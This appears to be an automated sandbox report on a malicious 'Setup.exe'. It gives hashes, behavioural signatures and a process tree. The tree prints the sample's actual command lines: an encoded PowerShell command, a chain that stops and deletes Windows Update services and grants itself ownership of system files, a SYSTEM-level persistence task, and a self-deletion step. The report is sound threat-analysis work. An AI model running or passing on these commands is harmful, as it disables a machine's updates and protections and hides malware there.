General
Target: Setup.exe
Filesize: 4MB
Completed: 05-05-2022 01:14
Task: behavioral1
Score: 10/10
MD5: 62ed80f638e9551e1e59b4ea9341bccd
SHA1: 44196e8cb0f5774decf60e12215767f092c3c008
SHA256: c1143945d2559da08d0fe82b3eb88e1e7238c752b05f3b8c7970e6bd3f6c97bf
SHA512: 56ba1326b1d691838a77ba3e353b17421d5602d378a73e213b7bc045d3befd304ef5a1170df5ba30ef237df9ef2b18283d19fdf23c025291763c8751ae838cad

Malware Config
Signatures 17

  • Modifies security service
    reg.exe

    TTPs

    Modify Registry, Modify Existing Service

    Reported IOCs

    description | ioc | process
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters | reg.exe
    Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security | reg.exe
  • Executes dropped EXE
    iexplor.exe, iexplore.exe

    Reported IOCs

    pid | process
    1732 | iexplor.exe
    284 | iexplore.exe
  • Possible privilege escalation attempt
    icacls.exe, takeown.exe

    Reported IOCs

    pid | process
    1756 | icacls.exe
    1868 | takeown.exe
  • Stops running service(s)

    TTPs

    Modify Existing Service, Service Stop
  • Loads dropped DLL
    Setup.exe

    Reported IOCs

    pid | process
    1656 | Setup.exe
  • Modifies file permissions
    icacls.exe, takeown.exe

    TTPs

    File Permissions Modification

    Reported IOCs

    pid | process
    1756 | icacls.exe
    1868 | takeown.exe
  • Checks whether UAC is enabled
    iexplore.exe

    TTPs

    System Information Discovery

    Reported IOCs

    description | ioc | process
    Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | iexplore.exe
  • Looks up external IP address via web service

    Description

    Uses a legitimate IP lookup service to find the infected system's external IP.

    Reported IOCs

    flow | ioc
    4 | ip-api.com
  • Drops file in System32 directory
    reg.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | reg.exe
  • Suspicious use of SetThreadContext
    iexplor.exe

    Reported IOCs

    description | pid | process | target process
    PID 1732 set thread context of 1712 | 1732 | iexplor.exe | AppLaunch.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    TTPs

    System Information Discovery
  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pid | process
    544 | schtasks.exe
  • Modifies registry key
    reg.exe

    TTPs

    Modify Registry

    Reported IOCs

    pid | process
    896 | reg.exe
    1436 | reg.exe
    1548 | reg.exe
    1736 | reg.exe
    2036 | reg.exe
    1620 | reg.exe
    1212 | reg.exe
    1476 | reg.exe
    2032 | reg.exe
  • Suspicious behavior: EnumeratesProcesses
    reg.exe, iexplore.exe

    Reported IOCs

    pid | process
    896 | reg.exe
    284 | iexplore.exe
  • Suspicious use of AdjustPrivilegeToken
    AppLaunch.exe, reg.exe, iexplore.exe, takeown.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 1712 | AppLaunch.exe
    Token: SeDebugPrivilege | 896 | reg.exe
    Token: SeDebugPrivilege | 284 | iexplore.exe
    Token: SeTakeOwnershipPrivilege | 1868 | takeown.exe
  • Suspicious use of WriteProcessMemory
    Setup.exe, iexplor.exe, iexplore.exe, cmd.exe

    Reported IOCs

    description | pid | process | target process
    PID 1656 wrote to memory of 1732 | 1656 | Setup.exe | iexplor.exe
    PID 1732 wrote to memory of 1712 | 1732 | iexplor.exe | AppLaunch.exe
    PID 1656 wrote to memory of 284 | 1656 | Setup.exe | iexplore.exe
    PID 284 wrote to memory of 768 | 284 | iexplore.exe | cmd.exe
    PID 768 wrote to memory of 896 | 768 | cmd.exe | powershell.exe
    PID 284 wrote to memory of 1980 | 284 | iexplore.exe | cmd.exe
    PID 1980 wrote to memory of 1660 | 1980 | cmd.exe | schtasks.exe
    PID 1980 wrote to memory of 616 | 1980 | cmd.exe | sc.exe
    PID 1980 wrote to memory of 1200 | 1980 | cmd.exe | sc.exe
    PID 1980 wrote to memory of 884 | 1980 | cmd.exe | sc.exe
    PID 1980 wrote to memory of 952 | 1980 | cmd.exe | sc.exe
    PID 1980 wrote to memory of 1620 | 1980 | cmd.exe | reg.exe
    PID 1980 wrote to memory of 1212 | 1980 | cmd.exe | reg.exe
    PID 1980 wrote to memory of 2032 | 1980 | cmd.exe | reg.exe
    PID 1980 wrote to memory of 2036 | 1980 | cmd.exe | reg.exe
    PID 1980 wrote to memory of 1476 | 1980 | cmd.exe | reg.exe
    PID 1980 wrote to memory of 1868 | 1980 | cmd.exe | takeown.exe
    PID 1980 wrote to memory of 1756 | 1980 | cmd.exe | icacls.exe
    PID 284 wrote to memory of 1296 | 284 | iexplore.exe | cmd.exe
Processes 37
  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    Loads dropped DLL
    Suspicious use of WriteProcessMemory
    PID:1656
    • C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      C:\Users\Admin\AppData\Local\Temp\iexplor.exe
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        Suspicious use of AdjustPrivilegeToken
        PID:1712
    • C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      C:\Users\Admin\AppData\Local\Temp\iexplore.exe
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:284
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
        Suspicious use of WriteProcessMemory
        PID:768
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        Suspicious use of WriteProcessMemory
        PID:1980
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:1756
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          Suspicious use of AdjustPrivilegeToken
          PID:1868
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          Modifies registry key
          PID:1476
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          Modifies registry key
          PID:2036
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          Modifies security service
          Modifies registry key
          PID:2032
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          Modifies registry key
          PID:1212
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          Modifies registry key
          PID:1620
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:952
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:884
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:1200
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:616
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:1660
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          Drops file in System32 directory
          Modifies registry key
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:896
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          PID:1604
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
          PID:1012
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
          PID:1660
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
          PID:1496
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
          PID:660
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          PID:1772
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
          PID:1572
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:1436
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          Modifies registry key
          PID:1548
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          Modifies registry key
          PID:1736
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
        PID:1296
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "iexplore"
        PID:828
        • C:\Windows\system32\schtasks.exe
          schtasks /run /tn "iexplore"
          PID:1132
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iexplore.exe"
        PID:1708
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -EncodedCommand "PAAjAHIAbAB6ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAaABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAawB3AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcABxAGoAIwA+AA=="
    PID:896
  • C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "iexplore" /tr "C:\Program Files\Microsoft\Internet Explorer\UserData\Low\iexplore.exe"
    Creates scheduled task(s)
    PID:544
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {47D75480-1254-4120-8999-F0B8E9C07A5F} S-1-5-18:NT AUTHORITY\System:Service:
    PID:1924
  • C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    PID:1996
Network
MITRE ATT&CK Matrix
Tactic columns: Collection, Command and Control, Credential Access, Execution, Exfiltration, Impact, Initial Access, Lateral Movement, Privilege Escalation
Downloads